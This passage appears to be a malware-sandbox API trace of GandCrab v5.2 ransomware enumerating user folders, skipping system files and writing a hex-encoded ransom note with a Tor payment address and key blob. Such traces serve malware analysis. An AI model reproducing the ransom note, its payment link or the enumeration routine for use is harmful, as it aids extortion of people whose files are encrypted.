(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\TITWMVJL-DECRYPT.txt") returned 82 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.195] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.196] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.196] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0072.196] CloseHandle (hObject=0x2c4) returned 1 [0072.197] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.197] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0072.197] CloseHandle (hObject=0x2bc) returned 1 [0072.198] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.198] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0072.198] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0072.198] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0072.198] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0072.198] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.198] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.198] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.199] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.199] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.199] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.199] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.199] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.199] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\TITWMVJL-DECRYPT.txt") returned 87 [0072.199] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.201] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x6